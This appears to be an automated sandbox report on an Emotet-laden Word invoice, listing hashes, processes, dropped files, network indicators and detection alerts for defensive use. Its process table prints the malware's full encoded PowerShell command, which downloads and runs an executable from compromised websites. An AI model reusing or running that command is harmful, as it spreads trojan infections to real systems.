analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Facture_Num_DI19822128.doc

Full analysis: https://app.any.run/tasks/a82dc68f-520c-4467-a0f8-d3cbea52d595
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: March 21, 2019, 18:27:03
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
loader
emotet
trojan
emotet-doc
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Mar 21 15:17:00 2019, Last Saved Time/Date: Thu Mar 21 15:17:00 2019, Number of Pages: 1, Number of Words: 1, Number of Characters: 6, Security: 0
MD5:

6ADCA84CC2C35C98FAA55889DBFCBAED

SHA1:

CD41B91563C475BCE16A33D68C4DA93B2804D1B1

SHA256:

3FE9DC7B6B63F42E75F753E95E6D8934C228561310BF811C98EE421D49DBFED7

SSDEEP:

3072:u77HUUUUUUUUUUUUUUUUUUUTkOQePu5U8q+AGphPJ54haq:u77HUUUUUUUUUUUUUUUUUUUT52VLAGH4

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • 583.exe (PID: 1764)
      • wabmetagen.exe (PID: 1516)
      • 583.exe (PID: 2764)
      • wabmetagen.exe (PID: 3096)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 3744)
    • Emotet process was detected

      • wabmetagen.exe (PID: 1516)
    • Changes the autorun value in the registry

      • wabmetagen.exe (PID: 3096)
    • Connects to CnC server

      • wabmetagen.exe (PID: 3096)
    • EMOTET was detected

      • wabmetagen.exe (PID: 3096)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 3744)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 3744)
      • 583.exe (PID: 2764)
    • Starts itself from another location

      • 583.exe (PID: 2764)
    • Application launched itself

      • 583.exe (PID: 1764)
      • wabmetagen.exe (PID: 1516)
    • Connects to server without host name

      • wabmetagen.exe (PID: 3096)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 1848)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 1848)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: -
Subject: -
Author: -
Keywords: -
Comments: -
Template: Normal.dotm
LastModifiedBy: -
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2019:03:21 15:17:00
ModifyDate: 2019:03:21 15:17:00
Pages: 1
Words: 1
Characters: 6
Security: None
CodePage: Windows Latin 1 (Western European)
Company: -
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 6
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
38
Monitored processes
6
Malicious processes
4
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs powershell.exe 583.exe no specs 583.exe #EMOTET wabmetagen.exe no specs #EMOTET wabmetagen.exe

Process information

PID
CMD
Path
Indicators
Parent process
1848"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Facture_Num_DI19822128.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3744powershell -e JABLAHcAdwBBAEEAMQA0AEcAPQAoACcASQBCACcAKwAnAEIAVQBBAEEAMQAxACcAKQA7ACQAWABvAFUAUQBBAFEAYwA9AC4AKAAnAG4AJwArACcAZQB3AC0AbwBiACcAKwAnAGoAZQAnACsAJwBjAHQAJwApACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAQQBYAFUAWABCAEEAPQAoACcAaAB0AHQAcAA6ACcAKwAnAC8ALwBhAHYAbwBjACcAKwAnAGEAdABzAC0AZQB0ACcAKwAnAHIAYQBuAGcAZQByAHMALgBjAG8AJwArACcAbQAvAHcAcAAtACcAKwAnAGEAJwArACcAZAAnACsAJwBtAGkAbgAnACsAJwAvADAAcwBtAC8AQABoAHQAdAAnACsAJwBwADoALwAvAGEAcgB0AGUAJwArACcAYwBhAHUAdAAnACsAJwBvAG0AYQB0ACcAKwAnAGUAbgAnACsAJwAuACcAKwAnAGMAbwBtACcAKwAnAC8AdwBwAC0AYwBvAG4AdAAnACsAJwBlACcAKwAnAG4AdAAvACcAKwAnADIAJwArACcANwA1AFcAdwBhAC8AQABoACcAKwAnAHQAdABwACcAKwAnADoALwAvAHQAaQB0ACcAKwAnAGEAbgAnACsAJwBpAHUAbQB0AHYALgBjAGwAdQBiAC8AdwBwAC0AYwBvAG4AdABlACcAKwAnAG4AdAAvAEEAMwAxAGsAOQBPACcAKwAnAC8AQABoAHQAdABwADoAJwArACcALwAvAGUAeQAnACsAJwBuAG8AJwArACcAcgBkAGkAYwAuAGMAbwAnACsAJwBtAC8AYwAnACsAJwBnAGkALQBiACcAKwAnAGkAbgAvAEwAJwArACcAagAvAEAAaAB0ACcAKwAnAHQAcAA6ACcAKwAnAC8AJwArACcALwB0AGUAcwAnACsAJwB0AC4AbwAnACsAJwByAGQAJwArACcALgAnACsAJwBuAHUAJwArACcAdQBjAGwAJwArACcAbwB1AGQALgBjAG8AbQAvAGEAdwBzAHQAYQB0AHMAJwArACcALQBpAGMAbwAnACsAJwBuAC8AcwAnACsAJwBYACcAKwAnAEEAJwArACcAUAB5AC8AJwApAC4AKAAnAFMAJwArACcAcABsAGkAdAAnACkALgBJAG4AdgBvAGsAZQAoACcAQAAnACkAOwAkAEsAQQA0AHgAQQBDAFUAPQAoACcAWQA0AF8AJwArACcAdwBCAEEAJwApADsAJAB3AEEAQQBVAEEAMQB4ACAAPQAgACgAJwA1ACcAKwAnADgAMwAnACkAOwAkAG4AUQB3AEEANABjAD0AKAAnAFUAQQBEACcAKwAnAEEAJwArACcAQQBjAEEAYwAnACkAOwAkAEkAWgBHAEIAQgBBAEEAQQA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAdwBBAEEAVQBBADEAeAArACgAJwAuACcAKwAnAGUAeABlACcAKQA7AGYAbwByAGUAYQBjAGgAKAAkAGEAWABvAFoANABBACAAaQBuACAAJABBAFgAVQBYAEIAQQApAHsAdAByAHkAewAkAFgAbwBVAFEAQQBRAGMALgAoACcARABvACcAKwAnAHcAbgBsAG8AYQBkAEYAaQBsACcAKwAnAGUAJwApAC4ASQBuAHYAbwBrAGUAKAAkAGEAWABvAFoANABBACwAIAAkAEkAWgBHAEIAQgBBAEEAQQApADsAJABmAHcARABjADQAWAA9ACgAJwBNAFUAJwArACcANABjADQAQQAnACkAOwBJAGYAIAAoACgALgAoACcARwBlAHQALQBJACcAKwAnAHQAZQAnACsAJwBtACcAKQAgACQASQBaAEcAQgBCAEEAQQBBACkALgAiAGwAZQBgAE4ARwBgAFQASAAiACAALQBnAGUAIAA0ADAAMAAwADAAKQAgAHsALgAoACcASQBuAHYAbwAnACsAJwBrAGUALQAnACsAJwBJAHQAZQAnACsAJwBtACcAKQAgACQASQBaAEcAQgBCAEEAQQBBADsAJABiAHcAQQBBAEEAQQA9ACgAJwBjAFEAQQBEAHgAJwArACcANABYACcAKQA7AGIAcgBlAGEAawA7AH0AfQBjAGEAdABjAGgAewB9AH0AJABoAGMAVQBrAFEAQwA9ACgAJwBjACcAKwAnAEEAMQBrAFUAQQBBACcAKQA7AA==C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
1764"C:\Users\admin\583.exe" C:\Users\admin\583.exepowershell.exe
User:
admin
Integrity Level:
MEDIUM
Description:
Windows 8 Toast Notification
Exit code:
0
Version:
8,6,0,1000
2764--5568bf2eC:\Users\admin\583.exe
583.exe
User:
admin
Integrity Level:
MEDIUM
Description:
Windows 8 Toast Notification
Exit code:
0
Version:
8,6,0,1000
1516"C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe"C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe
583.exe
User:
admin
Integrity Level:
MEDIUM
Description:
Windows 8 Toast Notification
Exit code:
0
Version:
8,6,0,1000
3096--9bc43e78C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe
wabmetagen.exe
User:
admin
Integrity Level:
MEDIUM
Description:
Windows 8 Toast Notification
Version:
8,6,0,1000
Total events
1 705
Read events
1 222
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
2
Text files
0
Unknown types
3

Dropped files

PID
Process
Filename
Type
1848WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR8A16.tmp.cvr
MD5:
SHA256:
3744powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\13IDAXX3HNP773ETYIVY.temp
MD5:
SHA256:
1848WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:C5A97215604B7D51D58E4643AA25396F
SHA256:EE7AFB0C6890A7B7FCB2F4CFF23804EB196200D4157FAB0722734C7EDCDE62A2
1848WINWORD.EXEC:\Users\admin\AppData\Local\Temp\VBE\MSForms.exdtlb
MD5:F84AF5893A002E32211C052D7EE6D14F
SHA256:A2154F1E4E16C5A231B01DB09D1DFE7321495315224F2D33934198CED539A18B
3744powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:7100C9D54A32DFE02751A9E1BC41F804
SHA256:80122C0BA2B02BE359C80E807AC522D838DB909ED232DFD076AD9B65F7FE699C
1848WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$cture_Num_DI19822128.docpgc
MD5:2E91697A18AF1F559BC5E9B51E9F5637
SHA256:A17A70A7638B0B6247023210EB54077FE6575F95635F6040C2B82ECE0E2DAF57
3744powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RFf9476.TMPbinary
MD5:7100C9D54A32DFE02751A9E1BC41F804
SHA256:80122C0BA2B02BE359C80E807AC522D838DB909ED232DFD076AD9B65F7FE699C
2764583.exeC:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exeexecutable
MD5:5EC56FCB08064E096C43650A73C8152C
SHA256:8CC8F26B0E2173A24A1A4A5B869AFD03F9E10FE4BC945160DF89C594B87C06BD
3744powershell.exeC:\Users\admin\583.exeexecutable
MD5:5EC56FCB08064E096C43650A73C8152C
SHA256:8CC8F26B0E2173A24A1A4A5B869AFD03F9E10FE4BC945160DF89C594B87C06BD
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
2
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3096
wabmetagen.exe
POST
200
200.116.26.234:80
http://200.116.26.234/srvc/
CO
binary
132 b
malicious
3744
powershell.exe
GET
200
163.172.199.28:80
http://avocats-etrangers.com/wp-admin/0sm/
FR
executable
171 Kb
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3096
wabmetagen.exe
200.116.26.234:80
EPM Telecomunicaciones S.A. E.S.P.
CO
malicious
3744
powershell.exe
163.172.199.28:80
avocats-etrangers.com
Online S.a.s.
FR
suspicious

DNS requests

Domain
IP
Reputation
avocats-etrangers.com
  • 163.172.199.28
suspicious

Threats

PID
Process
Class
Message
3744
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
3744
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
3744
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
1 ETPRO signatures available at the full report
No debug info